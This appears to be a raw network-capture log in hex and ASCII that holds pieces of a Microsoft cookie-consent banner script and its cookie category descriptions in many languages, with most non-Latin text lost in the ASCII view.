                                                                                                                                                                                    2023-01-05 07:58:52 UTC14755INData Raw: 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 7d 2c 65 7d 28 29 2c 64 3d 5b 22 61 72 22 2c 22 68 65 22 2c 22 70 73 22 2c 22 75 72 22 2c 22 66 61 22 2c 22 70 61 22 2c 22 73 64 22 2c 22 74 6b 22 2c 22 75 67 22 2c 22 79 69 22 2c 22 73 79 72 22 2c 22 6b 73 2d 61 72 61 62 22 5d 2c 75 3d 7b 22 63 6c 6f 73 65 2d 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3a 22 23 36 36 36 36 36 36 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2d 6f 70 61 63 69 74 79 22 3a 22 31 22 2c 22 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
                                                                                                                                                                                    Data Ascii: background-color: "+e["radio-button-disabled-color"]+" !important;\n }"},e}(),d=["ar","he","ps","ur","fa","pa","sd","tk","ug","yi","syr","ks-arab"],u={"close-button-color":"#666666","secondary-button-disabled-opacity":"1","secondary-button
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14763INData Raw: 63 65 70 74 41 6c 6c 4c 61 62 65 6c 29 2b 27 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 27 2b 62 2e 62 61 6e 6e 65 72 42 75 74 74 6f 6e 2b 22 20 22 2b 62 2e 73 65 63 6f 6e 64 61 72 79 42 75 74 74 6f 6e 54 68 65 6d 65 2b 27 22 3e 27 2b 74 2e 65 73 63 61 70 65 48 74 6d 6c 28 74 68 69 73 2e 74 65 78 74 52 65 73 6f 75 72 63 65 73 2e 72 65 6a 65 63 74 41 6c 6c 4c 61 62 65 6c 29 2b 27 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 27 2b 62 2e 62 61 6e 6e 65 72 42 75 74 74 6f 6e 2b 22 20 22 2b 62 2e 73 65 63 6f 6e 64 61 72 79 42 75 74 74 6f 6e
                                                                                                                                                                                    Data Ascii: ceptAllLabel)+'</button>\n <button type="button" class="'+b.bannerButton+" "+b.secondaryButtonTheme+'">'+t.escapeHtml(this.textResources.rejectAllLabel)+'</button>\n <button type="button" class="'+b.bannerButton+" "+b.secondaryButton
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14771INData Raw: 70 6f 72 74 65 64 2c 20 73 65 74 74 69 6e 67 20 63 6f 6e 73 65 6e 74 20 69 73 20 68 61 6e 64 6c 65 64 20 62 79 20 6c 69 62 72 61 72 79 22 29 7d 2c 65 2e 68 61 73 43 6f 6e 73 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 28 29 7d 2c 65 2e 69 73 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 21 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 77 63 70 43 6f 6e 73 65 6e 74 42 61 6e 6e 65 72 43 74 72 6c 22 29 7d 2c 65 2e 65 6d 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 61 3d 5b 5d 2c 69 3d 31 3b 69 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 61 5b 69 2d 31 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 69 5d 3b 76 61 72 20 6e 3d 74 68 69 73 2e
                                                                                                                                                                                    Data Ascii: ported, setting consent is handled by library")},e.hasConsent=function(){return g()},e.isVisible=function(){return!!document.getElementById("wcpConsentBannerCtrl")},e.emit=function(e){for(var a=[],i=1;i<arguments.length;i++)a[i-1]=arguments[i];var n=this.
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14779INData Raw: 20 79 6f 75 20 63 6c 69 63 6b 20 6f 6e 20 6f 72 20 70 75 72 63 68 61 73 65 73 20 79 6f 75 20 6d 61 6b 65 20 61 66 74 65 72 20 63 6c 69 63 6b 69 6e 67 20 6f 6e 20 61 6e 20 61 64 20 66 6f 72 20 70 61 79 6d 65 6e 74 20 70 75 72 70 6f 73 65 73 2c 20 61 6e 64 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 74 68 61 74 20 61 72 65 20 6d 6f 72 65 20 72 65 6c 65 76 61 6e 74 20 74 6f 20 79 6f 75 2e 20 46 6f 72 20 65 78 61 6d 70 6c 65 2c 20 74 68 65 79 27 72 65 20 75 73 65 64 20 74 6f 20 64 65 74 65 63 74 20 77 68 65 6e 20 79 6f 75 20 63 6c 69 63 6b 20 6f 6e 20 61 6e 20 61 64 20 61 6e 64 20 73 68 6f 77 20 79 6f 75 20 61 64 73 20 62 61 73 65 64 20 6f 6e 20 79 6f 75 72 20 73 6f 63 69 61 6c 20 6d 65 64 69 61 20 69 6e 74 65 72 65 73 74 73 20 61 6e 64 20 77 65 62 73
                                                                                                                                                                                    Data Ascii: you click on or purchases you make after clicking on an ad for payment purposes, and to show you ads that are more relevant to you. For example, they're used to detect when you click on an ad and show you ads based on your social media interests and webs
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14787INData Raw: 85 d9 84 d9 81 d8 a7 d8 aa 20 d8 aa d8 b9 d8 b1 d9 8a d9 81 20 d8 a7 d9 84 d8 a7 d8 b1 d8 aa d8 a8 d8 a7 d8 b7 20 d8 b9 d9 84 d9 89 20 d9 88 d8 b3 d8 a7 d8 a6 d9 84 20 d8 a7 d9 84 d8 aa d9 88 d8 a7 d8 b5 d9 84 20 d8 a7 d9 84 d8 a7 d8 ac d8 aa d9 85 d8 a7 d8 b9 d9 8a 20 d9 84 d8 b9 d8 b1 d8 b6 20 d8 a7 d9 84 d8 a5 d8 b9 d9 84 d8 a7 d9 86 d8 a7 d8 aa 20 d9 88 d8 a7 d9 84 d9 85 d8 ad d8 aa d9 88 d9 89 20 d8 a7 d8 b3 d8 aa d9 86 d8 a7 d8 af d9 8b d8 a7 20 d8 a5 d9 84 d9 89 20 d9 85 d9 84 d9 81 d8 a7 d8 aa 20 d8 aa d8 b9 d8 b1 d9 8a d9 81 d9 83 20 d8 b9 d9 84 d9 89 20 d9 88 d8 b3 d8 a7 d8 a6 d9 84 20 d8 a7 d9 84 d8 aa d9 88 d8 a7 d8 b5 d9 84 20 d8 a7 d9 84 d8 a7 d8 ac d8 aa d9 85 d8 a7 d8 b9 d9 8a 20 d9 88 d8 a7 d9 84 d9 86 d8 b4 d8 a7 d8 b7 20 d8 b9 d9 84 d9
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14811INData Raw: e0 a4 86 e0 a4 b5 e0 a4 b6 e0 a5 8d e0 a4 af e0 a4 95 20 e0 a4 95 e0 a5 81 e0 a4 95 e0 a5 80 e0 a4 9c e0 a4 bc 20 e0 a4 95 e0 a4 be 20 e0 a4 b9 e0 a5 80 20 e0 a4 89 e0 a4 aa e0 a4 af e0 a5 8b e0 a4 97 20 e0 a4 95 e0 a4 bf e0 a4 af e0 a4 be 20 e0 a4 9c e0 a4 be e0 a4 8f e0 a4 97 e0 a4 be 2e 20 e0 a4 86 e0 a4 aa 20 e0 a4 aa e0 a5 83 e0 a4 b7 e0 a5 8d e0 a4 a0 20 e0 a4 95 e0 a5 87 20 e0 a4 a8 e0 a4 bf e0 a4 9a e0 a4 b2 e0 a5 87 20 e0 a4 ad e0 a4 be e0 a4 97 20 e0 a4 ae e0 a5 87 e0 a4 82 20 27 e0 a4 95 e0 a5 81 e0 a4 95 e0 a5 80 e0 a4 9c e0 a4 bc 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 ac e0 a4 82 e0 a4 a7 e0 a4 bf e0 a4 a4 20 e0 a4 95 e0 a4 b0 e0 a5 87 e0 a4 82 27 20 e0 a4 aa e0 a4 b0 20 e0 a4 95 e0 a5 8d e0 a4 b2 e0 a4 bf e0 a4 95 20 e0 a4 95 e0 a4 b0 e0 a4 95
                                                                                                                                                                                    Data Ascii: . ' '
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14819INData Raw: d0 b5 d1 80
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14819INData Raw: d1 81 d0 be d0 bd d0 b0 d0 bb d0 b8 d0 b7 d0 b8 d1 80 d0 b0 d0 bd d0 b0 20 d1 80 d0 b5 d0 ba d0 bb d0 b0 d0 bc d0 b0 20 d0 b2 d1 8a d0 b7 20 d0 be d1 81 d0 bd d0 be d0 b2 d0 b0 20 d0 bd d0 b0 20 d0 b2 d0 b0 d1 88 d0 b0 d1 82 d0 b0 20 d0 be d0 bd d0 bb d0 b0 d0 b9 d0 bd 20 d0 b0 d0 ba d1 82 d0 b8 d0 b2 d0 bd d0 be d1 81 d1 82 2e 20 d0 90 d0 ba d0 be 20 d0 be d1 82 d1 85 d0 b2 d1 8a d1 80 d0 bb d0 b8 d1 82 d0 b5 20 d0 be d0 bf d1 86 d0 b8 d0 be d0 bd d0 b0 d0 bb d0 bd d0 b8 d1 82 d0 b5 20 d0 b1 d0 b8 d1 81 d0 ba d0 b2 d0 b8 d1 82 d0 ba d0 b8 2c 20 d1 89 d0 b5 20 d1 81 d0 b5 20 d0 b8 d0 b7 d0 bf d0 be d0 bb d0 b7 d0 b2 d0 b0 d1 82 20 d1 81 d0 b0 d0 bc d0 be 20 d0 b1 d0 b8 d1 81 d0 ba d0 b2 d0 b8 d1 82 d0 ba d0 b8 2c 20 d0 ba d0 be d0 b8 d1 82 d0 be 20 d1 81
                                                                                                                                                                                    Data Ascii: . , ,
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14827INData Raw: c5 a1 69 68 20 77 65 62 20 6c 6f 6b 61 63 69 6a 61 2e 22 7d 2c 7b 69 64 3a 22 63 31 22 2c 6e 61 6d 65 3a 22 41 6e 61 6c 69 74 69 6b 61 22 2c 64 65 73 63 3a 22 44 6f 70 75 c5 a1 74 61 6d 6f 20 74 72 65 c4 87 69 6d 20 73 74 72 61 6e 61 6d 61 20 64 61 20 6b 6f 72 69 73 74 65 20 61 6e 61 6c 69 74 69 c4 8d 6b 65 20 6b 6f 6c 61 c4 8d 69 c4 87 65 20 64 61 20 62 69 20 72 61 7a 75 6d 6a 65 6c 69 20 6b 61 6b 6f 20 6b 6f 72 69 73 74 69 74 65 20 6e 61 c5 a1 65 20 77 65 62 20 6c 6f 6b 61 63 69 6a 65 20 74 61 6b 6f 20 64 61 20 69 68 20 6d 6f c5 be 65 6d 6f 20 70 6f 62 6f 6c 6a c5 a1 61 74 69 2c 20 61 20 74 72 65 c4 87 65 20 73 74 72 61 6e 65 20 6d 6f 67 75 20 72 61 7a 76 69 74 69 20 69 20 70 6f 62 6f 6c 6a c5 a1 61 74 69 20 73 76 6f 6a 65 20 70 72 6f 69 7a 76 6f 64 65
                                                                                                                                                                                    Data Ascii: ih web lokacija."},{id:"c1",name:"Analitika",desc:"Doputamo treim stranama da koriste analitike kolaie da bi razumjeli kako koristite nae web lokacije tako da ih moemo poboljati, a tree strane mogu razviti i poboljati svoje proizvode
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14835INData Raw: 69 65 20 70 72 6f 20 73 6f 63 69 c3 a1 6c 6e c3 ad 20 73 c3 ad 74 c4 9b 20 70 6f 75 c5 be c3 ad 76 c3 a1 6d 65 20 73 70 6f 6c 75 20 73 20 74 c5 99 65 74 c3 ad 6d 69 20 73 74 72 61 6e 61 6d 69 20 6b 20 7a 6f 62 72 61 7a 6f 76 c3 a1 6e c3 ad 20 72 65 6b 6c 61 6d 20 61 20 6f 62 73 61 68 75 20 6e 61 20 7a c3 a1 6b 6c 61 64 c4 9b 20 76 61 c5 a1 69 63 68 20 70 72 6f 66 69 6c c5 af 20 6e 61 20 73 6f 63 69 c3 a1 6c 6e c3 ad 63 68 20 73 c3 ad 74 c3 ad 63 68 20 61 20 61 6b 74 69 76 69 74 20 6e 61 20 6e 61 c5 a1 69 63 68 20 77 65 62 65 63 68 2e 20 53 6c 6f 75 c5 be c3 ad 20 6b 20 70 72 6f 70 6f 6a 65 6e c3 ad 20 76 61 c5 a1 c3 ad 20 61 6b 74 69 76 69 74 79 20 6e 61 20 6e 61 c5 a1 69 63 68 20 77 65 62 65 63 68 20 73 20 70 72 6f 66 69 6c 79 20 6e 61 20 73 6f 63 69 c3
                                                                                                                                                                                    Data Ascii: ie pro sociln st pouvme spolu s tetmi stranami k zobrazovn reklam a obsahu na zklad vaich profil na socilnch stch a aktivit na naich webech. Slou k propojen va aktivity na naich webech s profily na soci
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14843INData Raw: 61 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 64 3d 35 32 31 38 33 39 27 3e 44 61 74 65 6e 73 63 68 75 74 7a 65 72 6b 6c c3 a4 72 75 6e 67 3c 2f 61 3e 20 3c 61 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 6b 61 2e 6d 73 2f 33 72 64 70 61 72 74 79 63 6f 6f 6b 69 65 73 27 3e 43 6f 6f 6b 69 65 73 20 76 6f 6e 20 44 72 69 74 74 61 6e 62 69 65 74 65 72 6e 3c 2f 61 3e 22 2c 61 63 63 65 70 74 41 6c 6c 4c 61 62 65 6c 3a 22 41 6e 6e 65 68 6d 65 6e 22 2c 72 65 6a 65 63 74 41 6c 6c 4c 61 62 65 6c 3a 22 41 62 6c 65 68 6e 65 6e 22 2c 6d 6f 72 65 49 6e 66 6f 4c 61 62 65 6c 3a 22 43
                                                                                                                                                                                    Data Ascii: a target='_blank' href='https://go.microsoft.com/fwlink/?LinkId=521839'>Datenschutzerklrung</a> <a target='_blank' href='https://aka.ms/3rdpartycookies'>Cookies von Drittanbietern</a>",acceptAllLabel:"Annehmen",rejectAllLabel:"Ablehnen",moreInfoLabel:"C
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14851INData Raw: b7 cf 83 ce b9 ce bc ce bf cf 80 ce bf ce b9 ce bf cf 8d ce bc ce b5 20 ce bf cf 81 ce b9 cf 83 ce bc ce ad ce bd ce b1 20 63 6f 6f 6b 69 65 20 ce b1 ce bd ce ac ce bb cf 85 cf 83 ce b7 cf 82 20 ce b3 ce b9 ce b1 20 ce b4 ce b9 ce b1 cf 86 ce b7 ce bc ce af cf 83 ce b5 ce b9 cf 82 2e 22 7d 2c 7b 69 64 3a 22 63 32 22 2c 6e 61 6d 65 3a 22 43 6f 6f 6b 69 65 20 ce bc ce ad cf 83 cf 89 ce bd 20 ce ba ce bf ce b9 ce bd cf 89 ce bd ce b9 ce ba ce ae cf 82 20 ce b4 ce b9 ce ba cf 84 cf 8d cf 89 cf 83 ce b7 cf 82 22 2c 64 65 73 63 3a 22 ce 95 ce bc ce b5 ce af cf 82 2c 20 ce ba ce b1 ce b8 cf 8e cf 82 20 ce ba ce b1 ce b9 20 cf 84 cf 81 ce af cf 84 ce b1 20 ce bc ce ad cf 81 ce b7 2c 20 cf 87 cf 81 ce b7 cf 83 ce b9 ce bc ce bf cf 80 ce bf ce b9 ce bf cf 8d ce bc
                                                                                                                                                                                    Data Ascii: cookie ."},{id:"c2",name:"Cookie ",desc:", ,
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14859INData Raw: 7b 69 64 3a 22 63 31 22 2c 6e 61 6d 65 3a 22 41 6e c3 a1 6c 69 73 69 73 22 2c 64 65 73 63 3a 22 50 65 72 6d 69 74 69 6d 6f 73 20 61 20 74 65 72 63 65 72 6f 73 20 75 74 69 6c 69 7a 61 72 20 63 6f 6f 6b 69 65 73 20 64 65 20 61 6e c3 a1 6c 69 73 69 73 20 70 61 72 61 20 63 6f 6d 70 72 65 6e 64 65 72 20 63 c3 b3 6d 6f 20 75 74 69 6c 69 7a 61 73 20 6e 75 65 73 74 72 6f 73 20 73 69 74 69 6f 73 20 77 65 62 20 64 65 20 66 6f 72 6d 61 20 71 75 65 20 70 6f 64 61 6d 6f 73 20 6d 65 6a 6f 72 61 72 6c 6f 73 20 79 20 71 75 65 20 64 69 63 68 6f 73 20 74 65 72 63 65 72 6f 73 20 70 75 65 64 61 6e 20 64 65 73 61 72 72 6f 6c 6c 61 72 20 79 20 6d 65 6a 6f 72 61 72 20 73 75 73 20 70 72 6f 64 75 63 74 6f 73 2c 20 6c 61 73 20 63 75 61 6c 65 73 20 70 75 65 64 65 6e 20 75 74 69 6c
                                                                                                                                                                                    Data Ascii: {id:"c1",name:"Anlisis",desc:"Permitimos a terceros utilizar cookies de anlisis para comprender cmo utilizas nuestros sitios web de forma que podamos mejorarlos y que dichos terceros puedan desarrollar y mejorar sus productos, las cuales pueden util
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14867INData Raw: 65 64 69 61 73 73 61 20 6e c3 a4 6b 65 6d c3 a4 73 69 20 6d 61 69 6e 6f 6b 73 65 74 20 6a 61 20 73 69 73 c3 a4 6c 74 c3 b6 20 76 61 73 74 61 61 76 61 74 20 70 61 72 65 6d 6d 69 6e 20 6b 69 69 6e 6e 6f 73 74 75 6b 73 65 6e 20 6b 6f 68 74 65 69 74 61 73 69 2e 22 7d 2c 7b 69 64 3a 22 63 33 22 2c 6e 61 6d 65 3a 22 4d 61 69 6e 6f 6e 74 61 22 2c 64 65 73 63 3a 22 4d 61 69 6e 6f 6e 74 61 65 76 c3 a4 73 74 65 69 64 65 6e 20 61 76 75 6c 6c 61 20 4d 69 63 72 6f 73 6f 66 74 20 6a 61 20 6b 6f 6c 6d 61 6e 6e 65 74 20 6f 73 61 70 75 6f 6c 65 74 20 76 6f 69 76 61 74 20 6e c3 a4 79 74 74 c3 a4 c3 a4 20 73 69 6e 75 6c 6c 65 20 75 75 73 69 61 20 6d 61 69 6e 6f 6b 73 69 61 20 74 61 6c 6c 65 6e 74 61 6d 61 6c 6c 61 20 74 69 65 74 6f 6a 61 20 73 69 69 74 c3 a4 2c 20 6d 69 74
                                                                                                                                                                                    Data Ascii: ediassa nkemsi mainokset ja sislt vastaavat paremmin kiinnostuksen kohteitasi."},{id:"c3",name:"Mainonta",desc:"Mainontaevsteiden avulla Microsoft ja kolmannet osapuolet voivat nytt sinulle uusia mainoksia tallentamalla tietoja siit, mit
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14875INData Raw: 20 63 68 75 6d 61 69 6c 20 61 69 72 20 64 c3 a8 20 61 6e 20 74 2d 73 61 6e 61 73 61 63 68 64 20 61 69 72 20 61 6d 20 62 72 69 6f 67 20 74 68 75 20 6e 6f 20 72 75 64 61 6e 20 61 20 63 68 65 61 6e 6e 61 69 63 68 65 61 73 20 74 75 20 61 6e 20 64 c3 a8 69 64 68 20 64 68 75 74 20 62 72 69 6f 67 61 64 68 20 61 69 72 20 73 61 6e 61 73 61 63 68 64 20 61 69 72 73 6f 6e 20 70 c3 a0 69 67 68 65 61 64 68 20 61 67 75 73 20 61 69 72 73 6f 6e 20 73 61 6e 61 73 61 63 68 64 20 61 20 73 68 65 61 6c 6c 74 61 69 6e 6e 20 61 20 62 68 69 6f 73 20 6e 61 73 20 69 6f 6d 63 68 61 69 64 68 65 20 64 68 75 74 2d 73 61 2e 20 4d 61 72 20 65 69 73 69 6d 70 6c 65 69 72 2c 20 61 69 72 73 6f 6e 20 e2 80 99 73 20 67 75 6d 20 62 69 20 66 69 6f 73 20 61 67 61 69 6e 6e 20 6e 75 61 69 72 20 61
                                                                                                                                                                                    Data Ascii: chumail air d an t-sanasachd air am briog thu no rudan a cheannaicheas tu an didh dhut briogadh air sanasachd airson pigheadh agus airson sanasachd a shealltainn a bhios nas iomchaidhe dhut-sa. Mar eisimpleir, airson s gum bi fios againn nuair a
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14931INData Raw: a2 d7 95 d7 aa 20 d7 95 d7 aa d7 9b d7 a0 d7 99 d7 9d 20 d7 94 d7 9e d7 91 d7 95 d7 a1 d7 a1 d7 99 d7 9d 20 d7 a2 d7 9c 20 d7 a4 d7 a8 d7 95 d7 a4 d7 99 d7 9c d7 99 20 d7 94 d7 9e d7 93 d7 99 d7 94 20 d7 94 d7 97 d7 91 d7 a8 d7 aa d7 99 d7 99 d7 9d 20 d7 95 d7 94 d7 a4 d7 a2 d7 99 d7 9c d7 95 d7 aa 20 d7 a9 d7 9c d7 a0 d7 95 20 d7 91 d7 90 d7 aa d7 a8 d7 99 20 d7 94 d7 90 d7 99 d7 a0 d7 98 d7 a8 d7 a0 d7 98 20 d7 a9 d7 9c d7 a0 d7 95 2e 20 d7 94 d7 9d 20 d7 9e d7 a9 d7 9e d7 a9 d7 99 d7 9d 20 d7 9c d7 97 d7 99 d7 91 d7 95 d7 a8 20 d7 94 d7 a4 d7 a2 d7 99 d7 9c d7 95 d7 aa 20 d7 a9 d7 9c d7 9a 20 d7 91 d7 90 d7 aa d7 a8 d7 99 20 d7 94 d7 90 d7 99 d7 a0 d7 98 d7 a8 d7 a0 d7 98 20 d7 a9 d7 9c d7 a0 d7 95 20 d7 9c d7 a4 d7 a8 d7 95 d7 a4 d7 99 d7 9c d7 99 20
                                                                                                                                                                                    Data Ascii: .
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14939INData Raw: 20 6d c3 a9 64 69 c3 a1 73 20 6f 6c 64 61 6c 61 6b 6f 6e 20 61 20 66 65 6c 68 61 73 7a 6e c3 a1 6c c3 b3 6b 20 c3 a9 72 64 65 6b 6c c5 91 64 c3 a9 73 c3 a9 72 65 20 66 65 6c 74 65 68 65 74 c5 91 65 6e 20 73 7a c3 a1 6d 6f 74 20 74 61 72 74 c3 b3 20 68 69 72 64 65 74 c3 a9 73 65 6b 20 c3 a9 73 20 74 61 72 74 61 6c 6d 61 6b 20 6a 65 6c 65 6e 6a 65 6e 65 6b 20 6d 65 67 2e 22 7d 2c 7b 69 64 3a 22 63 33 22 2c 6e 61 6d 65 3a 22 52 65 6b 6c c3 a1 6d 63 c3 a9 6c c3 ba 22 2c 64 65 73 63 3a 22 4d 69 6e 64 20 74 c3 a1 72 73 61 73 c3 a1 67 75 6e 6b 2c 20 6d 69 6e 64 20 6e c3 a9 68 c3 a1 6e 79 20 70 61 72 74 6e 65 72 c3 bc 6e 6b 20 61 20 6b 6f 72 c3 a1 62 62 61 6e 20 6d c3 a1 72 20 6d 65 67 6a 65 6c 65 6e c3 ad 74 65 74 74 20 68 69 72 64 65 74 c3 a9 73 65 6b 65 74 20
                                                                                                                                                                                    Data Ascii: mdis oldalakon a felhasznlk rdekldsre felteheten szmot tart hirdetsek s tartalmak jelenjenek meg."},{id:"c3",name:"Reklmcl",desc:"Mind trsasgunk, mind nhny partnernk a korbban mr megjelentett hirdetseket
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14947INData Raw: 6e 66 6f 72 6d
                                                                                                                                                                                    Data Ascii: nform
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14947INData Raw: 61 74 69 76 61 20 73 75 6c 6c 61 20 70 72 69 76 61 63 79 3c 2f 61 3e 20 3c 61 20 74 61 72 67 65 74 3d 27 5f 62 6c 61 6e 6b 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 6b 61 2e 6d 73 2f 33 72 64 70 61 72 74 79 63 6f 6f 6b 69 65 73 27 3e 43 6f 6f 6b 69 65 20 64 69 20 74 65 72 7a 61 20 70 61 72 74 69 3c 2f 61 3e 22 2c 61 63 63 65 70 74 41 6c 6c 4c 61 62 65 6c 3a 22 41 63 63 65 74 74 61 22 2c 72 65 6a 65 63 74 41 6c 6c 4c 61 62 65 6c 3a 22 52 69 66 69 75 74 61 22 2c 6d 6f 72 65 49 6e 66 6f 4c 61 62 65 6c 3a 22 47 65 73 74 69 73 63 69 20 69 20 63 6f 6f 6b 69 65 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 43 6c 6f 73 65 4c 61 62 65 6c 3a 22 43 68 69 75 64 69 22 2c 70 72 65 66 65 72 65 6e 63 65 73 44 69 61 6c 6f 67 54 69 74 6c 65 3a 22 47 65
                                                                                                                                                                                    Data Ascii: ativa sulla privacy</a> <a target='_blank' href='https://aka.ms/3rdpartycookies'>Cookie di terza parti</a>",acceptAllLabel:"Accetta",rejectAllLabel:"Rifiuta",moreInfoLabel:"Gestisci i cookie",preferencesDialogCloseLabel:"Chiudi",preferencesDialogTitle:"Ge
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14955INData Raw: b7 d0 b3 d0 b5 20 d0 bd d0 b5 d0 b3 d1 96 d0 b7 d0 b4 d0 b5 d0 bb d0 b3 d0 b5 d0 bd 20 d0 b6 d0 b5 d0 ba d0 b5 d0 bb d0 b5 d0 bd d0 b4 d1 96 d1 80 d1 96 d0 bb d0 b3 d0 b5 d0 bd 20 d0 b6 d0 b0 d1 80 d0 bd d0 b0 d0 bc d0 b0 d0 bb d0 b0 d1 80 d0 b4 d1 8b 20 d0 ba d3 a9 d1 80 d1 81 d0 b5 d1 82 d1 83 20 d2 af d1 88 d1 96 d0 bd 20 d2 9b d0 be d1 81 d1 8b d0 bc d1 88 d0 b0 20 d0 ba d1 83 d0 ba d0 b8 20 d1 84 d0 b0 d0 b9 d0 bb d0 b4 d0 b0 d1 80 d1 8b d0 bd 20 d0 bf d0 b0 d0 b9 d0 b4 d0 b0 d0 bb d0 b0 d0 bd d0 b0 d0 bc d1 8b d0 b7 2e 20 d0 a2 d0 b0 d2 a3 d0 b4 d0 b0 d1 83 d0 bb d1 8b 20 d0 ba d1 83 d0 ba d0 b8 20 d1 84 d0 b0 d0 b9 d0 bb d0 b4 d0 b0 d1 80 d1 8b d0 bd 20 d2 9b d0 b0 d0 b1 d1 8b d0 bb d0 b4 d0 b0 d0 bc d0 b0 d1 81 d0 b0 d2 a3 d1 8b d0 b7 2c 20 d2 9b
                                                                                                                                                                                    Data Ascii: . ,
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14963INData Raw: eb 8b b9 ec 82 ac 20 ec 9b b9 20 ec 82 ac ec 9d b4 ed 8a b8 ea b0 80 20 ec 9e 91 eb 8f 99 ed 95 98 ea b8 b0 20 ec 9c 84 ed 95 b4 20 ea bc ad 20 ed 95 84 ec 9a 94 ed 95 a9 eb 8b 88 eb 8b a4 2e 22 7d 2c 7b 69 64 3a 22 63 31 22 2c 6e 61 6d 65 3a 22 eb b6 84 ec 84 9d 22 2c 64 65 73 63 3a 22 eb 8b b9 ec 82 ac eb 8a 94 20 ec a0 9c 33 ec 9e 90 eb a1 9c 20 ed 95 98 ec 97 ac ea b8 88 20 eb b6 84 ec 84 9d 20 ec bf a0 ed 82 a4 eb a5 bc 20 ec 82 ac ec 9a a9 ed 95 98 eb 8f 84 eb a1 9d 20 ed 97 88 ec 9a a9 ed 95 98 ec 97 ac 20 ea b7 80 ed 95 98 ea b0 80 20 eb 8b b9 ec 82 ac 20 ec 9b b9 20 ec 82 ac ec 9d b4 ed 8a b8 eb a5 bc 20 eb 8d 94 20 ec 9e 98 20 ec 82 ac ec 9a a9 ed 95 a0 20 ec 88 98 20 ec 9e 88 eb 8f 84 eb a1 9d 20 ed 95 98 eb a9 b0 2c 20 4d 69 63 72 6f 73 6f 66
                                                                                                                                                                                    Data Ascii: ."},{id:"c1",name:"",desc:" 3 , Microsof
                                                                                                                                                                                    2023-01-05 07:58:52 UTC14971INData Raw: 65 6b 6c 61 6d 6f 73 20 73 6c 61 70 75 6b 61 69 22 2c 64 65 73 63 3a 22 4d 65 73 20 6b 61 72 74 75 20 73 75 20 74 72 65 c4 8d 69 6f 73 69 6f 6d 69 73 20 c5 a1 61 6c 69 6d 69 73 20 72 65 6b 6c 61 6d 6f 73 20 69 72 20 72 69 6e 6b 6f 64 61 72 6f 73 20 73 6c 61 70 75 6b 75 73 20 6e 61 75 64 6f 6a 61 6d 65 20 74 61 6d 2c 20 6b 61 64 20 72 6f 64 79 74 75 6d 65 20 6e 61 75 6a 61 73 20 72 65 6b 6c 61 6d 61 73 20 c4 af 72 61 c5 a1 79 64 61 6d 69 2c 20 6b 75 72 69 61 73 20 72 65 6b 6c 61 6d 61 73 20 6a 61 75 20 6d 61 74 c4 97 74 65 2e 20 4a 69 65 20 74 61 69 70 20 70 61 74 20 6e 61 75 64 6f 6a 61 6d 69 20 73 69 65 6b 69 61 6e 74 20 73 65 6b 74 69 2c 20 6b 75 72 69 61 73 20 72 65 6b 6c 61 6d 61 73 20 73 70 75 73 74 65 6c 69 74 65 20 61 72 62 61 20 6b c4 85 20 70 65
